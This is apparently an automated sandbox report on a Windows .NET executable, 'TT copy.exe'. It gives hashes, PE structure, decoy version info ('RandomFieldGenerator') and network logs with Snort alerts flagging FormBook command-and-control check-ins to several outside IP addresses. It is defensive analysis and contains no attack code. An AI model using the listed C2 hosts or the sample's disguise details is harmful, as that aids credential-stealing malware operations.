                                                                                                          SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Entropy (8bit):7.846879588611659
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                          File name:TT copy.exe
                                                                                                          File size:661504
                                                                                                          MD5:6443c909d7e8034f945f3e1dc138a046
                                                                                                          SHA1:a8a4d0653f3598cd477e5887cf12b3ed33625898
                                                                                                          SHA256:de1caed83e7085b2ee79d77ea41b9cfa079182680e7db2c1a8d3cedbc2ac2676
                                                                                                          SHA512:cb15a3039678a6dccfdaf91c3adad44ae243f9a7072bc361807fbc116e8e131fb6b1a038f954558bdc33f5097039f4deb03a717563b3cd0fae88bf6376e88217
                                                                                                          SSDEEP:12288:gxcggFvvr8qAs3eNmNapF2Gmolguwa9R6pes0CWB9+YOI/I:WEvrBAs3emE5WulGp3xaGaI
                                                                                                          TLSH:6EE401A8B2B79E13D5255776D1F2026D03F16582E132E3C71FDA52CA1A027E54EC1F8B
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..............,... ...@....@.. ....................................@................................

                                                                                                          File Icon

                                                                                                          Icon Hash:00828e8e8686b000

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x4a2cee
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                          Time Stamp:0xE98C9EE8 [Mon Mar 1 18:37:28 2094 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:v4.0.30319
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          jmp dword ptr [00402000h]
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa2ca00x4b.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x600.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xa60000xc.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xa2c4f0x1c.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x20000xa0cf40xa0e00False0.918677459693data7.8550082389IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0xa40000x6000x600False0.430338541667data4.19980462584IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0xa60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                          RT_VERSION0xa40a00x374data
                                                                                                          RT_MANIFEST0xa44140x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          mscoree.dll_CorExeMain

                                                                                                          Version Infos

                                                                                                          DescriptionData
                                                                                                          Translation0x0000 0x04b0
                                                                                                          LegalCopyrightCopyright 2019
                                                                                                          Assembly Version1.0.0.0
                                                                                                          InternalNameStreamingContextSta.exe
                                                                                                          FileVersion1.0.0.0
                                                                                                          CompanyName
                                                                                                          LegalTrademarks
                                                                                                          Comments
                                                                                                          ProductNameRandomFieldGenerator
                                                                                                          ProductVersion1.0.0.0
                                                                                                          FileDescriptionRandomFieldGenerator
                                                                                                          OriginalFilenameStreamingContextSta.exe

                                                                                                          Network Behavior

                                                                                                          Snort IDS Alerts

                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                          192.168.2.418.193.36.15349786802031453 06/03/22-08:17:26.941837TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978680192.168.2.418.193.36.153
                                                                                                          192.168.2.4154.36.145.11049893802031412 06/03/22-08:19:23.968199TCP2031412ET TROJAN FormBook CnC Checkin (GET)4989380192.168.2.4154.36.145.110
                                                                                                          192.168.2.4185.254.241.17349780802031453 06/03/22-08:16:58.893159TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978080192.168.2.4185.254.241.173
                                                                                                          192.168.2.4185.254.241.17349780802031412 06/03/22-08:16:58.893159TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978080192.168.2.4185.254.241.173
                                                                                                          192.168.2.418.193.36.15349786802031412 06/03/22-08:17:26.941837TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978680192.168.2.418.193.36.153
                                                                                                          192.168.2.4154.36.145.11049893802031453 06/03/22-08:19:23.968199TCP2031453ET TROJAN FormBook CnC Checkin (GET)4989380192.168.2.4154.36.145.110
                                                                                                          192.168.2.434.102.136.18049896802031453 06/03/22-08:19:29.232565TCP2031453ET TROJAN FormBook CnC Checkin (GET)4989680192.168.2.434.102.136.180
                                                                                                          192.168.2.434.102.136.18049896802031412 06/03/22-08:19:29.232565TCP2031412ET TROJAN FormBook CnC Checkin (GET)4989680192.168.2.434.102.136.180
                                                                                                          192.168.2.4185.254.241.17349780802031449 06/03/22-08:16:58.893159TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978080192.168.2.4185.254.241.173
                                                                                                          192.168.2.418.193.36.15349786802031449 06/03/22-08:17:26.941837TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978680192.168.2.418.193.36.153
                                                                                                          192.168.2.434.102.136.18049896802031449 06/03/22-08:19:29.232565TCP2031449ET TROJAN FormBook CnC Checkin (GET)4989680192.168.2.434.102.136.180
                                                                                                          192.168.2.4154.36.145.11049893802031449 06/03/22-08:19:23.968199TCP2031449ET TROJAN FormBook CnC Checkin (GET)4989380192.168.2.4154.36.145.110

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jun 3, 2022 08:16:58.603405952 CEST4978080192.168.2.4185.254.241.173
                                                                                                          Jun 3, 2022 08:16:58.892931938 CEST8049780185.254.241.173192.168.2.4
                                                                                                          Jun 3, 2022 08:16:58.893033028 CEST4978080192.168.2.4185.254.241.173
                                                                                                          Jun 3, 2022 08:16:58.893158913 CEST4978080192.168.2.4185.254.241.173
                                                                                                          Jun 3, 2022 08:16:59.184253931 CEST8049780185.254.241.173192.168.2.4
                                                                                                          Jun 3, 2022 08:16:59.184284925 CEST8049780185.254.241.173192.168.2.4
                                                                                                          Jun 3, 2022 08:16:59.184439898 CEST4978080192.168.2.4185.254.241.173
                                                                                                          Jun 3, 2022 08:16:59.199980021 CEST4978080192.168.2.4185.254.241.173
                                                                                                          Jun 3, 2022 08:16:59.489670038 CEST8049780185.254.241.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:09.455876112 CEST4978380192.168.2.4162.213.255.237
                                                                                                          Jun 3, 2022 08:17:09.623946905 CEST8049783162.213.255.237192.168.2.4
                                                                                                          Jun 3, 2022 08:17:09.624089003 CEST4978380192.168.2.4162.213.255.237
                                                                                                          Jun 3, 2022 08:17:09.624197006 CEST4978380192.168.2.4162.213.255.237
                                                                                                          Jun 3, 2022 08:17:09.791697025 CEST8049783162.213.255.237192.168.2.4
                                                                                                          Jun 3, 2022 08:17:09.869417906 CEST8049783162.213.255.237192.168.2.4
                                                                                                          Jun 3, 2022 08:17:09.869456053 CEST8049783162.213.255.237192.168.2.4
                                                                                                          Jun 3, 2022 08:17:09.869611025 CEST4978380192.168.2.4162.213.255.237
                                                                                                          Jun 3, 2022 08:17:11.636780024 CEST4978380192.168.2.4162.213.255.237
                                                                                                          Jun 3, 2022 08:17:11.805303097 CEST8049783162.213.255.237192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.876758099 CEST4978480192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.896604061 CEST804978418.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.896914005 CEST4978480192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.897332907 CEST4978480192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.897754908 CEST4978480192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.898488045 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.916351080 CEST804978418.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.916953087 CEST804978418.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.916986942 CEST804978418.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.917125940 CEST4978480192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.917160034 CEST4978480192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.917546034 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.917673111 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.921689034 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.922116995 CEST4978680192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.940596104 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.940642118 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.940670013 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.940696001 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.940722942 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.940751076 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.940778971 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.940789938 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.940804958 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.940831900 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.940833092 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.940846920 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.940865040 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.940876961 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.940891027 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.940902948 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.941128969 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.941257954 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.941409111 CEST804978618.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.941689014 CEST4978680192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.941837072 CEST4978680192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.959610939 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.959635973 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.959722996 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.959762096 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.959799051 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.959803104 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.959809065 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.959994078 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.960078001 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.960102081 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.960119963 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.960134983 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.960139990 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.960164070 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.960191965 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.960289955 CEST804978518.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.960331917 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.960346937 CEST4978580192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.960700035 CEST804978618.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.960726976 CEST804978618.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.960746050 CEST804978618.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:26.960892916 CEST4978680192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.962259054 CEST4978680192.168.2.418.193.36.153
                                                                                                          Jun 3, 2022 08:17:26.981889009 CEST804978618.193.36.153192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.138861895 CEST4978980192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.238564014 CEST804978966.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.238653898 CEST4978980192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.238796949 CEST4978980192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.238871098 CEST4978980192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.239272118 CEST4979080192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.336659908 CEST804978966.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.337215900 CEST804979066.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.337344885 CEST4979080192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.338881969 CEST4979080192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.339355946 CEST4979180192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.378067970 CEST804978966.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.378091097 CEST804978966.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.378197908 CEST4978980192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.378207922 CEST4978980192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.436837912 CEST804979066.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.436865091 CEST804979066.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.436877012 CEST804979066.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.436914921 CEST804979066.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.436929941 CEST4979080192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.436988115 CEST4979080192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.437530041 CEST804979166.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.437624931 CEST4979180192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.438126087 CEST4979180192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.534831047 CEST804979066.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.534849882 CEST804979066.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.534861088 CEST804979066.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.535408974 CEST804979066.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.535424948 CEST804979066.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.535851002 CEST804979166.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.549096107 CEST804979166.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.549120903 CEST804979166.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.549354076 CEST4979180192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.549397945 CEST4979180192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.550848007 CEST804979066.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.550870895 CEST804979066.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:37.550973892 CEST4979080192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.551006079 CEST4979080192.168.2.466.96.162.130
                                                                                                          Jun 3, 2022 08:17:37.647284985 CEST804979166.96.162.130192.168.2.4
                                                                                                          Jun 3, 2022 08:17:48.598498106 CEST4982380192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:48.809325933 CEST8049823198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:48.809709072 CEST4982380192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:48.809731960 CEST4982380192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:48.810147047 CEST4982380192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:48.810195923 CEST4982480192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.014390945 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.016530037 CEST4982480192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.017874002 CEST4982480192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.018563986 CEST8049823198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.018598080 CEST8049823198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.019500971 CEST4982380192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.024636984 CEST4982580192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.218827009 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.218854904 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.218921900 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.218961954 CEST4982480192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.219019890 CEST4982480192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.229768038 CEST8049825198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.230441093 CEST4982580192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.230521917 CEST4982580192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.419919968 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.419945955 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.419962883 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.420046091 CEST4982480192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.420099020 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.420269012 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.420337915 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.438215017 CEST8049825198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.438241005 CEST8049825198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.438254118 CEST8049825198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.438541889 CEST4982580192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.438605070 CEST4982580192.168.2.4198.44.241.20
                                                                                                          Jun 3, 2022 08:17:49.622168064 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.622190952 CEST8049824198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:49.645550966 CEST8049825198.44.241.20192.168.2.4
                                                                                                          Jun 3, 2022 08:17:54.877490997 CEST4983580192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.043728113 CEST8049835107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.044131994 CEST4983580192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.044303894 CEST4983580192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.044327974 CEST4983580192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.044770956 CEST4983680192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.210653067 CEST8049835107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.211394072 CEST8049835107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.211483955 CEST4983580192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.223176956 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.223376036 CEST4983680192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.225189924 CEST4983680192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.225615025 CEST4983780192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.392237902 CEST8049837107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.392379999 CEST4983780192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.392704964 CEST4983780192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.403311014 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.403341055 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.403357983 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.403441906 CEST4983680192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.403500080 CEST4983680192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.561633110 CEST8049837107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.561655998 CEST8049837107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.561887026 CEST4983780192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.561914921 CEST4983780192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.581384897 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.581613064 CEST4983680192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.581712008 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.581774950 CEST4983680192.168.2.4107.187.232.173
                                                                                                          Jun 3, 2022 08:17:55.581792116 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.581904888 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.728307009 CEST8049837107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.760027885 CEST8049836107.187.232.173192.168.2.4
                                                                                                          Jun 3, 2022 08:17:55.760061026 CEST8049836107.187.232.173192.168.2.4
